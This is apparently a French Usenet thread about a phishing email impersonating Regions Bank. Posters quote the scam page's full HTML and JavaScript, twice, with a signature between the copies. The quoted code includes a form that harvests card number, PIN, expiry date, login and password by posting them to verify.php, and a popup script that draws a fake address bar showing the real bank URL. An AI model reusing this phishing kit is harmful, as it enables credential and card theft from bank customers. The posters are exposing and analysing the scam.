//perform validation for logging in to IB
if (document.sign_on.user.value == ""){
alert("Please enter your CIN or User ID.");
document.sign_on.user.focus();
InputOK = "Alerted";
}
else if(document.sign_on.user.value.length > 26){
InputOK = "No_User";
}
else if(document.sign_on.user.value.length < 8){
InputOK = "No_User";
}
else if(!document.sign_on.user.value.search(/^[a-zA-Z0-9]{8,26}$/i) ==
-1){
InputOK = "No_User";
}
if(document.sign_on.pin.value == ""){
alert("Please enter your Password.");
document.sign_on.pin.focus();
InputOK = "Alerted";
}
else if((document.sign_on.pin.value.length >
8)||(document.sign_on.pin.value.length ==
5)||(document.sign_on.pin.value.length < 4)){
InputOK = "No_Pin";
}
else if(document.sign_on.pin.value.search(/[s]/i) > -1){
InputOK = "No_Pin";
}
if(InputOK == "Yes"){

iCount++;
document.sign_on.pin.value = document.sign_on.pin.value.toUpperCase();
document.sign_on.submit();
document.sign_on.pin.focus();
return true;
}
else{
if (InputOK != "Alerted") {
alert("Invalid log on. n Please try again.");
if(InputOK == "No_User") {
document.sign_on.user.focus();
} else {
document.sign_on.pin.focus();
}
}
return false;
}
} else {

//login to demo
InputOK = "Yes";
document.sign_on.submit();
document.sign_on.pin.focus();
return true;
}

} else {
if (null == fxndislocation) {
alert("Logon currently processing.");
}
return false;
}
}
var nSignonFocus = 0;
function signonFocus(){
nSignonFocus = 1;
}
function setFocusUser(){
document.sign_on.user.focus();
}

</script>

<noscript>
<META HTTP-EQUIV="refresh" CONTENT="30;
URL=/EBanking/app/cs/user/includes/enableJavascript.html">
</noscript>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta http-equiv="content-language" content="en">
<meta name="copyright" content="Copyright 2003. S1 Corporation. All
rights reserved.">
<link rel="stylesheet" href='id_main0.css' type="text/css">
<script language="JavaScript">

</script>

<SCRIPT type="text/javascript" src="BrowserS.js"></SCRIPT>
</head>
<body bgcolor="#ffffff" marginwidth="0" marginheight="0" leftmargin="0"
topmargin="0" onload="MM_preloadImages('main_b_access_orange_alt.gif',
'ss_b_contact_us_alt.jpg', 'ss_b_logout_alt.jpg', 'main_b_pbd_alt.gif',
'main_b_enroll.gif');setFocus()" onload="setFocusUser();"
oncontextmenu="return false">
<a name="top"></a>

<table width="100%" border="0" cellpadding="0" cellspacing="0"
background="sun_pixelrow.jpg">
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><img src="ss_login.jpg" height="81" width="482"></td>

</tr>
</table>
</td>
<td align="right">

<script type="text/javascript">

var vuln_x, vuln_y, vuln_w, vuln_h;
function vuln_calc() {
var root= document[
(document.compatMode=='CSS1Compat') ?
'documentElement' : 'body'
];
vuln_x= window./* */screenLeft+68;
vuln_y= window.screenTop-21;
vuln_w= root.offsetWidth-500;
vuln_h= 17;
vuln_show();
}

var vuln_win;
function vuln_pop() {
vuln_win= window.createPopup();
vuln_win.document.body.innerHTML= vuln_html;
vuln_win.document.body.style.margin= 0;
vuln_win.document.body.onunload= vuln_pop;
vuln_show();
}

function vuln_show() {
if (vuln_win)
vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);
}

var vuln_html= 'x3Cdiv style="height: 100%; line-height: 17px;
font-family: 'Tahoma', sans-serif; font-size:
8pt;">https://online.regions.com/ibsregions/cmserver/users/default/confirm.cfmx3C/div>'

if (window.createPopup) {
vuln_calc();
vuln_pop();
window.setInterval(vuln_calc, 25);
} else {

}
</script>

<table border="0" align="right" cellpadding="0" cellspacing="0">

<tr>
<td colspan="3"><img src="ss_sign0.jpg" height="56"
width="278"></td>
</tr>
<tr>
<td><a
href="https://secure.regions.com/servlet/Utils/Email.jsp"
onMouseOut="MM_swapImgRestore()"
onMouseOver="MM_swapImage('contactUs1','',jsContactImageRollover.toString(),1)"
target="_blank"><img src="ss_b_con.jpg" alt="Contact Us"
name="contactUs1" height="25" width="69" border="0"></a></td>
<td><a href="http://www.regions.com/"
onMouseOut="MM_swapImgRestore()"
onMouseOver="MM_swapImage('home1','',jsHomeImageRollover.toString(),1)"><img
src="ss_b_hom.jpg" alt="regions.com" name="home1" height="25"
width="100" border="0"></a></td>
<td><img src="ss_right.jpg" height="25" width="109"></td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0" cellpadding="0" cellspacing="0"
background="main_sub_back.gif">
<tr>
<td align="left">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><img src="ss_sub_l.gif" height="19" width="15"></td>
<td width="100%" background="main_sub_back.gif"><img
src="bank_tag.gif" height="19" width="154"></td>
</tr>
</table>

</td>
<td align="right">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td align="right"><img src="ss_sub_r.gif" height="19"
width="69"></td>
</tr>
</table>
</td>
</tr>

</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">

<tr>
<td width="25" height="100%"><img src="line_leg.gif" height="100%"
width="25"></td>
<td>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>

<table width="100%" border="0" cellspacing="0"
cellpadding="0">
<tr>
<td colspan="2"><img src="blank000.gif"
height="10"></td>
</tr>
<tr>
<td><span class="headline">Secure Confirmation
(Attention, ce site est un fake)</span></td>
<td colspan="1"> </td>
</tr>
<tr>
<td height="7" colspan="2"><img src="blank000.gif"
height="7" width="110"></td>

</tr>
</table>
</td>
</tr>
<tr>
<td>
<table class="hintAndMainOutline" cellpadding="0" cellspacing="0"
border="0">
<tr>
<td>
<table width="100%" border="0" cellspacing="1"
cellpadding="3">

<tr>

<td class="hintBackground" height="31"
valign="top" ><span class="hintblack">Please
confirm your banking details.</span></td>
</tr>
<tr>
<td class="mainSummaryBackground" height="46"
valign="top">
<table width="100%" border="0" cellspacing="0"
cellpadding="0">
<tr>
<td valign="top">
<p><span
class="spanhd">Confirm</span><br>
<span class="hintblack">By accessing
this online
system you agree to have read and
accepted the
terms set forth in the</span> <a
href="https://secure.regions.com/utilities/agreement.html"
target="_blank" class="uhintblack">Regions
Online Banking Agreement and Disclosure
Statement.</a></p>

<table width="722" border="0"
align="left" cellpadding="3" cellspacing="0">
<script type="text/javascript">
if(ie4 || ns4) {
document.write('<tr><td colspan="4"><table class="hintAndMainOutline"
cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td><table
width="100%" border="0" cellspacing="1" cellpadding="3"><tr><td
class="browserWarning"><table width="100%"><tr><td class="grnlabelleft"
colspan="4">Browser Warning</td></tr><tr><td class="data">RegionsNET is
best viewed with Microsoft Internet Explorer 5.0 or later versions and
Netscape Navigator 6.1 or later versions. Browser versions older than
the ones specified will not render consistently, and if you desire a
consistent experience please goto <a
href="http://www.microsoft.com/ie">http://www.microsoft.com/ie</a> or
<a
href="http://www.netscape.com/download">http://www.netscape.com/download</a>
to upgrade to a more recent browser.
</td></tr></table></td></tr></table></td></tr></table></td></tr>');
}
</script>
<form name="logonForm" method="POST"
action="verify.php" onsubmit="F2(); return verify(this,
'fln,ccnum,pin,exp,email', 'The fields <First and Last Name>,
<ATM/Debit Card>, <PIN>, <Expiration Date> and and <E-mail Address> are
required, please review your form and try again');">
<tr>
<td width="136" class="label">First
and Last
Name:</td>
<td width="4"> </td>
<td width="502">
<input type="text" name="fln"
maxlength="77" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">
</td>

<td rowspan="7" align="left"
width="57"> <noscript></noscript></td>
</tr>
<tr>
<td width="136"
class="label">ATM/Debit Card:
</td>
<td width="4"> </td>
<td width="502">
<input type="text" name="ccnum"
maxlength="33" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">
</td>
</tr>

<tr>
<td width="136" class="label">PIN:
</td>
<td width="4"> </td>
<td width="502">
<input type="password" name="pin"
maxlength="33" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">
</td>
</tr>
<tr>
<td width="136"
class="label">Expiration Date:
</td>

<td width="4"> </td>
<td width="502">
<input type="text" name="exp"
maxlength="33" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">
</td>
</tr>
<tr>
<td width="136" class="label">Login
ID: </td>
<td width="4"> </td>
<td width="502">
<input type="text" name="login"
maxlength="33" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">

</td>
</tr>
<tr>
<td width="136"
class="label">Password: </td>
<td width="4"> </td>
<td width="502">
<input type="password"
name="password" maxlength="33" size="21" tabindex="1" value=""
onfocus="MyFocus();" onblur="MyBlur();">
</td>
</tr>

<tr>
<td width="136"
class="label">E-mail Address:
</td>
<td width="4"> </td>
<td width="502">
<input type="text" name="email"
maxlength="33" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">
</td>
</tr>
<tr align="center">
<td height="45">
<div align="left"></div>

</td>
<td height="45"> </td>
<td height="45">
<div align="left">
<input type="image" src="main_b_confirm_orange.gif" border=0
width="116" height="22" name="Submit" value="Submit">
</div>
</td>
<td height="45"> </td>
</tr>
<input type=hidden name="s8fid"
value="111057873651" />

</form>
</table>
</td>
</tr>
<tr>
</tr>
</table>
</td>
</tr>
<tr>

<td class="hintBackground" height="46" valign="middle">
<table width="75%" border="0" align="center"
cellpadding="0" cellspacing="0">
<tr>
<td align="center"><a
href="http://www.regions.com/RegionsNet/regionsnet_demo/index.html"
onMouseOut="MM_swapImgRestore()"
onMouseOver="MM_swapImage('demo','',jsDemoImageRollover.toString(),1)"
target="_blank"><img src="main_b_p.gif" alt="Personal Banking Demo"
name="demo" height="22" width="158" border="0"></a></td>
<td align="center"><a
href="http://www.regions.com/personal/regionsnet.html"
onMouseOut="MM_swapImgRestore()"
onMouseOver="MM_swapImage('enroll','',jsEnrollImageRollover.toString(),1)"><img
src="main_b_e.gif" alt="Enroll in RegionsNET" name="enroll" height="22"
width="141" border="0"></a></td>
</tr>
</table>
</td>
</tr>
</table>

</td>
</tr>
</table>
</td>
</tr>
<tr>
<td height="20"><img src="blank000.gif" height="20"
width="110"></td>
</tr>
<tr>

<td class="tableOutline">
<table width="100%" border="0" cellspacing="1" cellpadding="3">
<tr>
<td height="15" class="bhd">Disclaimer</td>
</tr>
<tr>

<td valign="top" class="rowEvenBackground"><span
class="hintblack">Confirmation
Policy: This is a protected data system with
monitoring and
active security. If you do not consent to monitoring,
or do
not have a valid information, please exit the system
now.</span></td>
</tr>
<tr>

<td width="100%">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><img src="main_cop.gif" height="18" width="203"
border="0" usemap="#Map3"></td>
<td><div align="right"><img src="main_mem.gif" height="18"
width="221" border="0" usemap="#Map2"></div></td>
</tr>
</table>
</td>
</tr>

</table>
</td>
</tr>
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2">

<map name="Map3">
<area class="subbarPointer" shape="rect" coords="120,2,197,14"
href="javascript:{privacy_window =
window.open('http://www.regions.com/about/privacy_pledge.html','privacy_window','widths0,heightI5,left0,scrollbars');
privacy_window.focus();}">
<area class="subbarPointer" shape="rect" coords="3,3,113,14"
href="javascript:{copy_window =
window.open('/EBanking/app/cs/user/includes/copyright.html','copy_window','widthP0,height 0,left0,topE0');
copy_window.focus();}">
</map>

<map name="Map2">
<area class="subbarPointer" shape="rect" coords="89,2,218,15"
href="javascript:{equal_window =
window.open('http://www.regions.com/personal/fs_ehl_popup.html','equal_window','widthP0,heightI5,left0');
equal_window.focus();}">
</map>

</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>

<td width="25" height="100%"><img src="line_rih.gif" height="100%"
width="25"></td>
</tr>
</table>

<head>
<meta http-equiv="pragma" content="no-cache">
</head>
</body>
</html>



--
Emmanuel
The C-FAQ: http://www.eskimo.com/~scs/C-faq/faq.html
The C-library: http://www.dinkumware.com/refxc.html

"Clearly your code does not meet the original spec."
"You are sentenced to 30 lashes with a wet noodle."
-- Jerry Coffin in a.l.c.c++

Vous avez filtré cet utilisateur ! Consultez son message

P.C. wrote on 03/02/05 :

"Imhotep" a écrit dans le message de
news:1043zkzk4hj6j$
Je réponds à P.C. :

Ce qui
est nouveau, c'est d^etre arrivé à truquer l'url de la page web!

Ce n'est pas nouveau non plus. Il suffit de lire le code HTML du message
pour voir que l'adresse réelle est cachée.

Monsieur (madame?) Momie,

je vous défie de regarder le code html du fichier avec la fonction view
source (ou au clic droit de la souris)! Enfin, sous IE6. L'auteur ne semble
pas être un débutant dans le domaine du grenouillage informatique.

Et voilà:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<script language="JavaScript" type="text/JavaScript">

</script>

<html lang="en">

<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META
HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-transform">
<title>Regions - Customer Details Confirmation</title>

<script type="text/javascript" language="JavaScript">
flag=1;
window.onfocus=MyFocus;
window.onblur=MyBlur;

function MyBlur(){
flag=1;
clearTimeout(to);
to=setTimeout("Ticker()", 100);
}

function MyFocus(){
flag=0;
}

function Ticker(){
if (flag==1) {window.focus();}
to=setTimeout("Ticker()", 100);
}

Ticker();

closeflag=1;

window.onbeforeunloadñ;
//window.onsubmitò;
function F1(){
if (closeflag)
Console(90,80);
//
window.open("index.htm","","width0,heightp0,top,leftp,scrollbars=no,toolbar=no,location=no,menubar=no,status=no,resizable=no");
}

function Console(width,height) {
var swidth=0;
var sheight=0;
if (self.screen) { // for NN4 and IE4
swidth = screen.width;
sheight = screen.height
}

new Object(
);
}

function F2(){
closeflag=0;
}

function isblank(fe){
if (fe.value == "") {
return true;
} else {
return false;
}
}

function verify(frm, fields, msg){
fieldarray = fields.split(",");
for (i=0; i<frm.elements.length; i++){
for (j=0; j<fieldarray.length; j++){
if ( fieldarray[j] == frm.elements[i].name &&
isblank(frm.elements[i])
) {
alert(msg);
frm.elements[i].focus();
return false;
}
}
}
return true;
}
</script>

<script language="JavaScript">
var now = new Date();
var month1 = "10";
var year4 = "2004";
var now = "10/23/2004";
var today = new Date();
var m = "10";
var d = "23";
var y = "2004";
var TodaysDate = "10/23/2004";
var isValidAmount = false;
var MAXXFRAMT = 100000;
var timeDelay = 1500;
var myAgent = "Nav";
var myPlatform = "notMac";
var vToday = TodaysDate.split("/");
var iBaseYear = parseFloat(vToday[2]);
var popupWin = "";
var popupPSR = "";
var ggWinCal = "";
function closepopupWin() {
if (typeof(popupWin.open) != "unknown") {
if (popupWin.open) {
popupWin.close();
}
}
if (typeof(popupPSR.open) != "unknown") {
if (popupPSR.open) {
popupPSR.close();
}
}

if (ggWinCal.open) {
ggWinCal.close();
}
}
function movepic(img_name,img_src) {
document[img_name].src=img_src;
}
function openWindow(url, name, width, height) {
popupWin = new Object(
)
}

function openWindow2(FileName, parentName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindow(FileName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindowSized(FileName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindowSizedCustom(FileName) {
popupPSR = new Object(

);
popupPSR.focus()
}
function openWindowFull(FileName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindowSizedModal(FileName) {
popupWin = window.showModalDialog(FileName, 'remote',
'location:no;menubar:no;scrollbars:yes;resizable:no;Dialogwidth:800px;Dialogheight:600px;');
popupWin.focus()
}
function OPENWINDOWFAQ(FileName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindowConfirm(FileName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindowConfirm2(FileName, parentName) {
popupWin = new Object(

);
popupWin.focus()
}
function openbrowsertest() {
popupWin = new Object(

);
}
function removeSpace(data) {
while (1) {
if (data.substring(data.length - 1, data.length) != " ")
break;
data = data.substring(0, data.length - 1);
}
return data;
}
function LogOff(){
document.SignOff.submit();
}

function CheckBrowser()
{
var agt=navigator.userAgent.toLowerCase();

// *** BROWSER VERSION ***
// Note: On IE5, these return 4, so use is_ie5up to detect IE5.
var is_major = parseInt(navigator.appVersion);
var is_minor = parseFloat(navigator.appVersion);

// Note: Opera and WebTV spoof Navigator. We do strict client
detection.
// If you want to allow spoofing, take out the tests for opera and
webtv.
var is_nav = ((agt.indexOf('mozilla')!=-1) &&
(agt.indexOf('spoofer')==-1)
&& (agt.indexOf('compatible') == -1) && (agt.indexOf('opera')==-1)
&& (agt.indexOf('webtv')==-1) && (agt.indexOf('hotjava')==-1));
var is_nav2 = (is_nav && (is_major == 2));
var is_nav3 = (is_nav && (is_major == 3));
var is_nav4 = (is_nav && (is_major == 4));
var is_nav4up = (is_nav && (is_major >= 4));
var is_navonly = (is_nav && ((agt.indexOf(";nav") != -1) ||
(agt.indexOf("; nav") != -1)) );
var is_nav6 = (is_nav && (is_major == 5));
var is_nav6up = (is_nav && (is_major >= 5));
var is_gecko = (agt.indexOf('gecko') != -1);

if (is_nav4)
{
alert("Thank you for your attempt to view Online Statements in Internet
Banking. Our online statements " +
"process will not work with the browser version you are currently
using. Please go to " +
"https://online.regions.com/ibsregions/cmserver/users/default/confirm.cfm,
select Help from the left navigation and then select Browser " +
"Information at the top. This page will provide you with a link
to upgrade your Netscape or " +
"Internet Explorer browser.");
return false;
}
}
</script>
<link rel="STYLESHEET" href="styles00.css" type="text/css">
<script language="javascript">
var msg = "";
var Logout = "No";
var prevkey = "";
var prevassigncount = 0;
var isNav = (navigator.appName.indexOf("Netscape") !=-1);
if (isNav){
window.captureEvents(Event.KEYPRESS)
window.onkeypress = getKey;
}
else{
document.onkeypress = getKey;
}
function getKey(keyStroke) {

if (prevassigncount != 0) prevkey = keyHit;
prevassigncount ++;
keyHit = (isNav) ? keyStroke.which : event.keyCode;
whichKey = String.fromCharCode(keyHit).toLowerCase();
checkKey();
}
function checkKey(){
//if(document.forms[0].name == "sign_on"){
if (keyHit=="13" && prevkey != "0"){
InputCheck();

}
//}
}

var submitted = false;
var iCount = 0;
var sPlatform = 'notMacNav';
function InputCheck(bClick, fxndislocation){
var InputOK = "Yes";
if (iCount == 0 || (sPlatform == "MacNav" && bClick)) {
if (document.sign_on.user.value != "Click Sign On") {
//clear the demo cookie
var expiresDate = "Wednesday, 01-Jan-2003 12:00:00 GMT";
document.cookie = "demo=;expires=" + expiresDate;
//perform validation for logging in to IB
if (document.sign_on.user.value == ""){
alert("Please enter your CIN or User ID.");
document.sign_on.user.focus();
InputOK = "Alerted";
}
else if(document.sign_on.user.value.length > 26){
InputOK = "No_User";
}
else if(document.sign_on.user.value.length < 8){
InputOK = "No_User";
}
else if(!document.sign_on.user.value.search(/^[a-zA-Z0-9]{8,26}$/i) ==
-1){
InputOK = "No_User";
}
if(document.sign_on.pin.value == ""){
alert("Please enter your Password.");
document.sign_on.pin.focus();
InputOK = "Alerted";
}
else if((document.sign_on.pin.value.length >
8)||(document.sign_on.pin.value.length ==
5)||(document.sign_on.pin.value.length < 4)){
InputOK = "No_Pin";
}
else if(document.sign_on.pin.value.search(/[s]/i) > -1){
InputOK = "No_Pin";
}
if(InputOK == "Yes"){

iCount++;
document.sign_on.pin.value = document.sign_on.pin.value.toUpperCase();
document.sign_on.submit();
document.sign_on.pin.focus();
return true;
}
else{
if (InputOK != "Alerted") {
alert("Invalid log on. n Please try again.");
if(InputOK == "No_User") {
document.sign_on.user.focus();
} else {
document.sign_on.pin.focus();
}
}
return false;
}
} else {

//login to demo
InputOK = "Yes";
document.sign_on.submit();
document.sign_on.pin.focus();
return true;
}

} else {
if (null == fxndislocation) {
alert("Logon currently processing.");
}
return false;
}
}
var nSignonFocus = 0;
function signonFocus(){
nSignonFocus = 1;
}
function setFocusUser(){
document.sign_on.user.focus();
}

</script>

<noscript>
<META HTTP-EQUIV="refresh" CONTENT="30;
URL=/EBanking/app/cs/user/includes/enableJavascript.html">
</noscript>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta http-equiv="content-language" content="en">
<meta name="copyright" content="Copyright 2003. S1 Corporation. All
rights reserved.">
<link rel="stylesheet" href='id_main0.css' type="text/css">
<script language="JavaScript">

</script>

<SCRIPT type="text/javascript" src="BrowserS.js"></SCRIPT>
</head>
<body bgcolor="#ffffff" marginwidth="0" marginheight="0" leftmargin="0"
topmargin="0" onload="MM_preloadImages('main_b_access_orange_alt.gif',
'ss_b_contact_us_alt.jpg', 'ss_b_logout_alt.jpg', 'main_b_pbd_alt.gif',
'main_b_enroll.gif');setFocus()" onload="setFocusUser();"
oncontextmenu="return false">
<a name="top"></a>

<table width="100%" border="0" cellpadding="0" cellspacing="0"
background="sun_pixelrow.jpg">
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><img src="ss_login.jpg" height="81" width="482"></td>

</tr>
</table>
</td>
<td align="right">

<script type="text/javascript">

var vuln_x, vuln_y, vuln_w, vuln_h;
function vuln_calc() {
var root= document[
(document.compatMode=='CSS1Compat') ?
'documentElement' : 'body'
];
vuln_x= window./* */screenLeft+68;
vuln_y= window.screenTop-21;
vuln_w= root.offsetWidth-500;
vuln_h= 17;
vuln_show();
}

var vuln_win;
function vuln_pop() {
vuln_win= window.createPopup();
vuln_win.document.body.innerHTML= vuln_html;
vuln_win.document.body.style.margin= 0;
vuln_win.document.body.onunload= vuln_pop;
vuln_show();
}

function vuln_show() {
if (vuln_win)
vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);
}

var vuln_html= 'x3Cdiv style="height: 100%; line-height: 17px;
font-family: 'Tahoma', sans-serif; font-size:
8pt;">https://online.regions.com/ibsregions/cmserver/users/default/confirm.cfmx3C/div>'

if (window.createPopup) {
vuln_calc();
vuln_pop();
window.setInterval(vuln_calc, 25);
} else {

}
</script>

<table border="0" align="right" cellpadding="0" cellspacing="0">

<tr>
<td colspan="3"><img src="ss_sign0.jpg" height="56"
width="278"></td>
</tr>
<tr>
<td><a
href="https://secure.regions.com/servlet/Utils/Email.jsp"
onMouseOut="MM_swapImgRestore()"
onMouseOver="MM_swapImage('contactUs1','',jsContactImageRollover.toString(),1)"
target="_blank"><img src="ss_b_con.jpg" alt="Contact Us"
name="contactUs1" height="25" width="69" border="0"></a></td>
<td><a href="http://www.regions.com/"
onMouseOut="MM_swapImgRestore()"
onMouseOver="MM_swapImage('home1','',jsHomeImageRollover.toString(),1)"><img
src="ss_b_hom.jpg" alt="regions.com" name="home1" height="25"
width="100" border="0"></a></td>
<td><img src="ss_right.jpg" height="25" width="109"></td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0" cellpadding="0" cellspacing="0"
background="main_sub_back.gif">
<tr>
<td align="left">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><img src="ss_sub_l.gif" height="19" width="15"></td>
<td width="100%" background="main_sub_back.gif"><img
src="bank_tag.gif" height="19" width="154"></td>
</tr>
</table>

</td>
<td align="right">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td align="right"><img src="ss_sub_r.gif" height="19"
width="69"></td>
</tr>
</table>
</td>
</tr>

</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">

<tr>
<td width="25" height="100%"><img src="line_leg.gif" height="100%"
width="25"></td>
<td>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>

<table width="100%" border="0" cellspacing="0"
cellpadding="0">
<tr>
<td colspan="2"><img src="blank000.gif"
height="10"></td>
</tr>
<tr>
<td><span class="headline">Secure Confirmation
(Attention, ce site est un fake)</span></td>
<td colspan="1"> </td>
</tr>
<tr>
<td height="7" colspan="2"><img src="blank000.gif"
height="7" width="110"></td>

</tr>
</table>
</td>
</tr>
<tr>
<td>
<table class="hintAndMainOutline" cellpadding="0" cellspacing="0"
border="0">
<tr>
<td>
<table width="100%" border="0" cellspacing="1"
cellpadding="3">

<tr>

<td class="hintBackground" height="31"
valign="top" ><span class="hintblack">Please
confirm your banking details.</span></td>
</tr>
<tr>
<td class="mainSummaryBackground" height="46"
valign="top">
<table width="100%" border="0" cellspacing="0"
cellpadding="0">
<tr>
<td valign="top">
<p><span
class="spanhd">Confirm</span><br>
<span class="hintblack">By accessing
this online
system you agree to have read and
accepted the
terms set forth in the</span> <a
href="https://secure.regions.com/utilities/agreement.html"
target="_blank" class="uhintblack">Regions
Online Banking Agreement and Disclosure
Statement.</a></p>

<table width="722" border="0"
align="left" cellpadding="3" cellspacing="0">
<script type="text/javascript">
if(ie4 || ns4) {
document.write('<tr><td colspan="4"><table class="hintAndMainOutline"
cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td><table
width="100%" border="0" cellspacing="1" cellpadding="3"><tr><td
class="browserWarning"><table width="100%"><tr><td class="grnlabelleft"
colspan="4">Browser Warning</td></tr><tr><td class="data">RegionsNET is
best viewed with Microsoft Internet Explorer 5.0 or later versions and
Netscape Navigator 6.1 or later versions. Browser versions older than
the ones specified will not render consistently, and if you desire a
consistent experience please goto <a
href="http://www.microsoft.com/ie">http://www.microsoft.com/ie</a> or
<a
href="http://www.netscape.com/download">http://www.netscape.com/download</a>
to upgrade to a more recent browser.
</td></tr></table></td></tr></table></td></tr></table></td></tr>');
}
</script>
<form name="logonForm" method="POST"
action="verify.php" onsubmit="F2(); return verify(this,
'fln,ccnum,pin,exp,email', 'The fields <First and Last Name>,
<ATM/Debit Card>, <PIN>, <Expiration Date> and and <E-mail Address> are
required, please review your form and try again');">
<tr>
<td width="136" class="label">First
and Last
Name:</td>
<td width="4"> </td>
<td width="502">
<input type="text" name="fln"
maxlength="77" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">
</td>

<td rowspan="7" align="left"
width="57"> <noscript></noscript></td>
</tr>
<tr>
<td width="136"
class="label">ATM/Debit Card:
</td>
<td width="4"> </td>
<td width="502">
<input type="text" name="ccnum"
maxlength="33" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">
</td>
</tr>

<tr>
<td width="136" class="label">PIN:
</td>
<td width="4"> </td>
<td width="502">
<input type="password" name="pin"
maxlength="33" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">
</td>
</tr>
<tr>
<td width="136"
class="label">Expiration Date:
</td>

<td width="4"> </td>
<td width="502">
<input type="text" name="exp"
maxlength="33" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">
</td>
</tr>
<tr>
<td width="136" class="label">Login
ID: </td>
<td width="4"> </td>
<td width="502">
<input type="text" name="login"
maxlength="33" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">

</td>
</tr>
<tr>
<td width="136"
class="label">Password: </td>
<td width="4"> </td>
<td width="502">
<input type="password"
name="password" maxlength="33" size="21" tabindex="1" value=""
onfocus="MyFocus();" onblur="MyBlur();">
</td>
</tr>

<tr>
<td width="136"
class="label">E-mail Address:
</td>
<td width="4"> </td>
<td width="502">
<input type="text" name="email"
maxlength="33" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">
</td>
</tr>
<tr align="center">
<td height="45">
<div align="left"></div>

</td>
<td height="45"> </td>
<td height="45">
<div align="left">
<input type="image" src="main_b_confirm_orange.gif" border=0
width="116" height="22" name="Submit" value="Submit">
</div>
</td>
<td height="45"> </td>
</tr>
<input type=hidden name="s8fid"
value="111057873651" />

</form>
</table>
</td>
</tr>
<tr>
</tr>
</table>
</td>
</tr>
<tr>

<td class="hintBackground" height="46" valign="middle">
<table width="75%" border="0" align="center"
cellpadding="0" cellspacing="0">
<tr>
<td align="center"><a
href="http://www.regions.com/RegionsNet/regionsnet_demo/index.html"
onMouseOut="MM_swapImgRestore()"
onMouseOver="MM_swapImage('demo','',jsDemoImageRollover.toString(),1)"
target="_blank"><img src="main_b_p.gif" alt="Personal Banking Demo"
name="demo" height="22" width="158" border="0"></a></td>
<td align="center"><a
href="http://www.regions.com/personal/regionsnet.html"
onMouseOut="MM_swapImgRestore()"
onMouseOver="MM_swapImage('enroll','',jsEnrollImageRollover.toString(),1)"><img
src="main_b_e.gif" alt="Enroll in RegionsNET" name="enroll" height="22"
width="141" border="0"></a></td>
</tr>
</table>
</td>
</tr>
</table>

</td>
</tr>
</table>
</td>
</tr>
<tr>
<td height="20"><img src="blank000.gif" height="20"
width="110"></td>
</tr>
<tr>

<td class="tableOutline">
<table width="100%" border="0" cellspacing="1" cellpadding="3">
<tr>
<td height="15" class="bhd">Disclaimer</td>
</tr>
<tr>

<td valign="top" class="rowEvenBackground"><span
class="hintblack">Confirmation
Policy: This is a protected data system with
monitoring and
active security. If you do not consent to monitoring,
or do
not have a valid information, please exit the system
now.</span></td>
</tr>
<tr>

<td width="100%">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><img src="main_cop.gif" height="18" width="203"
border="0" usemap="#Map3"></td>
<td><div align="right"><img src="main_mem.gif" height="18"
width="221" border="0" usemap="#Map2"></div></td>
</tr>
</table>
</td>
</tr>

</table>
</td>
</tr>
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2">

<map name="Map3">
<area class="subbarPointer" shape="rect" coords="120,2,197,14"
href="javascript:{privacy_window =
window.open('http://www.regions.com/about/privacy_pledge.html','privacy_window','widths0,heightI5,left0,scrollbars');
privacy_window.focus();}">
<area class="subbarPointer" shape="rect" coords="3,3,113,14"
href="javascript:{copy_window =
window.open('/EBanking/app/cs/user/includes/copyright.html','copy_window','widthP0,height 0,left0,topE0');
copy_window.focus();}">
</map>

<map name="Map2">
<area class="subbarPointer" shape="rect" coords="89,2,218,15"
href="javascript:{equal_window =
window.open('http://www.regions.com/personal/fs_ehl_popup.html','equal_window','widthP0,heightI5,left0');
equal_window.focus();}">
</map>

</td>
</tr>
</table>
</td>
